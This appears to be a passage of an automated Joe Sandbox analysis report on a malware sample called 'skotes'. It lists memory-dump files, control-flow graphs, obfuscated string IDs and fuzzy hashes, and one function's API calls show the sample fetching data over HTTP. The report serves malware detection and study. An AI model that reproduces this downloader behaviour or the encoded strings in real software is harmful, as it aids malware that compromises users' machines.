                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                                                                                                                                                • API String ID: 0-2571795437
                                                                                                                                                                • Opcode ID: ab1c9fb0f80d5775a6ef2f9f43075a58622e9c9990055c68bce472848d5e3bb5
                                                                                                                                                                • Instruction ID: cc924c425df7ee8fff5c676dd048c98fb46d40f5a6e2193e97fbebcaeadcce9c
                                                                                                                                                                • Opcode Fuzzy Hash: ab1c9fb0f80d5775a6ef2f9f43075a58622e9c9990055c68bce472848d5e3bb5
                                                                                                                                                                • Instruction Fuzzy Hash: A282E2709142889BEF14EF68C9897DE7FF5EB02304F5085D8E805673D2CB759A88CB92

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 2266 bc2517-bc253f call bc2133 call bc2191 2271 bc26e5-bc271a call bb6c87 call bc2133 call bc2191 2266->2271 2272 bc2545-bc2551 call bc2139 2266->2272 2297 bc2720-bc272c call bc2139 2271->2297 2298 bc2842-bc289e call bb6c87 call bc62ee 2271->2298 2272->2271 2278 bc2557-bc2562 2272->2278 2279 bc2598-bc25a1 call bbadf5 2278->2279 2280 bc2564-bc2566 2278->2280 2293 bc25a4-bc25a9 2279->2293 2282 bc2568-bc256c 2280->2282 2285 bc256e-bc2570 2282->2285 2286 bc2588-bc258a 2282->2286 2289 bc2584-bc2586 2285->2289 2290 bc2572-bc2578 2285->2290 2291 bc258d-bc258f 2286->2291 2289->2291 2290->2286 2294 bc257a-bc2582 2290->2294 2295 bc2595 2291->2295 2296 bc26e1-bc26e4 2291->2296 2293->2293 2299 bc25ab-bc25cc call bbb04b call bbadf5 2293->2299 2294->2282 2294->2289 2295->2279 2297->2298 2307 bc2732-bc273e call bc2165 2297->2307 2315 bc28a8-bc28ab 2298->2315 2316 bc28a0-bc28a6 2298->2316 2299->2296 2313 bc25d2-bc25d5 2299->2313 2307->2298 2318 bc2744-bc2765 call bbadf5 GetTimeZoneInformation 2307->2318 2317 bc25d8-bc25dd 2313->2317 2319 bc28ad-bc28bd call bbb04b 2315->2319 2320 bc28ee-bc2900 2315->2320 2316->2320 2317->2317 2321 bc25df-bc25f1 call bba1f1 2317->2321 2328 bc276b-bc278c 2318->2328 2329 bc2820-bc2841 call bc212d call bc2121 call bc2127 2318->2329 2337 bc28bf 2319->2337 2338 bc28c7-bc28e0 call bc62ee 2319->2338 2325 bc2910 2320->2325 2326 bc2902-bc2905 2320->2326 2321->2271 2341 bc25f7-bc260a call bc4b17 2321->2341 2333 bc2915-bc292a call bbadf5 call b9cff1 2325->2333 2334 bc2910 call bc26f2 2325->2334 2326->2325 2331 bc2907-bc290e call bc2517 2326->2331 2335 bc278e-bc2793 2328->2335 2336 bc2796-bc279d 2328->2336 2331->2333 2334->2333 2335->2336 2343 bc27af-bc27b1 2336->2343 2344 bc279f-bc27a6 2336->2344 2345 bc28c0-bc28c5 call bbadf5 2337->2345 2361 bc28e5-bc28eb call bbadf5 2338->2361 2362 bc28e2-bc28e3 2338->2362 2341->2271 2363 bc2610-bc2613 2341->2363 2353 bc27b3-bc27dc call bbef17 call bbe926 2343->2353 2344->2343 2351 bc27a8-bc27ad 2344->2351 2365 bc28ed 2345->2365 2351->2353 2379 bc27de-bc27e1 2353->2379 2380 bc27ea-bc27ec 2353->2380 2361->2365 2362->2345 2368 bc261b-bc2621 2363->2368 2369 bc2615-bc2619 2363->2369 2365->2320 2373 bc2624-bc2631 call bb8bbe 2368->2373 2374 bc2623 2368->2374 2369->2363 2369->2368 2381 bc2634-bc2639 2373->2381 2374->2373 2379->2380 2382 bc27e3-bc27e8 2379->2382 2383 bc27ee-bc280c call bbe926 2380->2383 2385 bc263b-bc2640 2381->2385 2386 bc2642-bc2643 2381->2386 2382->2383 2389 bc280e-bc2811 2383->2389 2390 bc281b-bc281e 2383->2390 2385->2386 2388 bc2645-bc2648 2385->2388 2386->2381 2391 bc264a-bc2661 call bb8bbe 2388->2391 2392 bc2696-bc2699 2388->2392 2389->2390 2393 bc2813-bc2819 2389->2393 2390->2329 2401 bc2675-bc2677 2391->2401 2402 bc2663 2391->2402 2394 bc269b-bc269d 2392->2394 2395 bc26a0-bc26b4 2392->2395 2393->2329 2394->2395 2397 bc26ca 2395->2397 2398 bc26b6-bc26c6 call bc4b17 2395->2398 2403 bc26cd-bc26df call bc212d call bc2121 2397->2403 2398->2271 2408 bc26c8 2398->2408 2401->2392 2407 bc2679-bc2689 call bb8bbe 2401->2407 2405 bc2665-bc266a 2402->2405 2403->2296 2405->2401 2409 bc266c-bc2673 2405->2409 2415 bc2690-bc2694 2407->2415 2408->2403 2409->2401 2409->2405 2415->2392 2416 bc268b-bc268d 2415->2416 2416->2392 2417 bc268f 2416->2417 2417->2415
                                                                                                                                                                APIs
                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BD6758), ref: 00BC275C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InformationTimeZone
                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                • API String ID: 565725191-239921721
                                                                                                                                                                • Opcode ID: 482d2ffc6e57a21ec52344f29945aee7923a7919fc234a67aee0d36a99f94b6f
                                                                                                                                                                • Instruction ID: c71037a3627fde2df667e7a937e5c0192ba383c323491884f333a9ca2d771d14
                                                                                                                                                                • Opcode Fuzzy Hash: 482d2ffc6e57a21ec52344f29945aee7923a7919fc234a67aee0d36a99f94b6f
                                                                                                                                                                • Instruction Fuzzy Hash: F3C10671A002459BDB249F78CC91FBE7BE9EF55350F1400EEE9909B251EB718E41C760

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00B8EB51
                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000), ref: 00B8EC83
                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00B8ED98
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile$CreateDirectory
                                                                                                                                                                • String ID: mxo1L0x$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
                                                                                                                                                                • API String ID: 1875963930-2267310118
                                                                                                                                                                • Opcode ID: 57966c3a98cde9dcc8c7442a636495ee68ade0501161addc4236256e1a206314
                                                                                                                                                                • Instruction ID: 8f204672bcb8a17f2fbecf8a7d9ffcfcf436ab1ec4e46b22566d722d3f0e6286
                                                                                                                                                                • Opcode Fuzzy Hash: 57966c3a98cde9dcc8c7442a636495ee68ade0501161addc4236256e1a206314
                                                                                                                                                                • Instruction Fuzzy Hash: EDF22C71A101489BEF18EB38CD8979D7BF29F46304F5482ECE409A73E6DB359A84CB51

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1240 b8be30-b8be7c 1241 b8c281-b8c2a6 call b980c0 1240->1241 1242 b8be82-b8be86 1240->1242 1247 b8c2a8-b8c2b4 1241->1247 1248 b8c2d4-b8c2ec 1241->1248 1242->1241 1244 b8be8c-b8be90 1242->1244 1244->1241 1246 b8be96-b8bf2a Sleep InternetOpenW InternetConnectA call b97a00 call b85c10 1244->1246 1271 b8bf2c 1246->1271 1272 b8bf2e-b8bf4a HttpOpenRequestA 1246->1272 1250 b8c2ca-b8c2d1 call b9d663 1247->1250 1251 b8c2b6-b8c2c4 1247->1251 1252 b8c238-b8c250 1248->1252 1253 b8c2f2-b8c2fe 1248->1253 1250->1248 1251->1250 1255 b8c34f-b8c354 call bb6c6a 1251->1255 1259 b8c323-b8c33f call b9cff1 1252->1259 1260 b8c256-b8c262 1252->1260 1257 b8c22e-b8c235 call b9d663 1253->1257 1258 b8c304-b8c312 1253->1258 1257->1252 1258->1255 1267 b8c314 1258->1267 1268 b8c268-b8c276 1260->1268 1269 b8c319-b8c320 call b9d663 1260->1269 1267->1257 1268->1255 1270 b8c27c 1268->1270 1269->1259 1270->1269 1271->1272 1277 b8bf7b-b8bfea call b97a00 call b85c10 call b97a00 call b85c10 1272->1277 1278 b8bf4c-b8bf5b 1272->1278 1292 b8bfec 1277->1292 1293 b8bfee-b8c004 HttpSendRequestA 1277->1293 1280 b8bf5d-b8bf6b 1278->1280 1281 b8bf71-b8bf78 call b9d663 1278->1281 1280->1281 1281->1277 1292->1293 1294 b8c035-b8c05d 1293->1294 1295 b8c006-b8c015 1293->1295 1298 b8c08e-b8c0af InternetReadFile 1294->1298 1299 b8c05f-b8c06e 1294->1299 1296 b8c02b-b8c032 call b9d663 1295->1296 1297 b8c017-b8c025 1295->1297 1296->1294 1297->1296 1303 b8c0b5 1298->1303 1301 b8c070-b8c07e 1299->1301 1302 b8c084-b8c08b call b9d663 1299->1302 1301->1302 1302->1298 1304 b8c0c0-b8c170 call bb4250 1303->1304
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(000005DC,670DF653,?,00000000), ref: 00B8BEB8
                                                                                                                                                                • InternetOpenW.WININET(00BD8DC8,00000000,00000000,00000000,00000000), ref: 00B8BEC7
                                                                                                                                                                • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00B8BEEB
                                                                                                                                                                • HttpOpenRequestA.WININET(?,00000000), ref: 00B8BF36
                                                                                                                                                                • HttpSendRequestA.WININET(?,00000000), ref: 00B8BFF6
                                                                                                                                                                • InternetReadFile.WININET(?,?,000003FF,?), ref: 00B8C0A7
                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00B8C187
                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00B8C18F
                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00B8C197
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
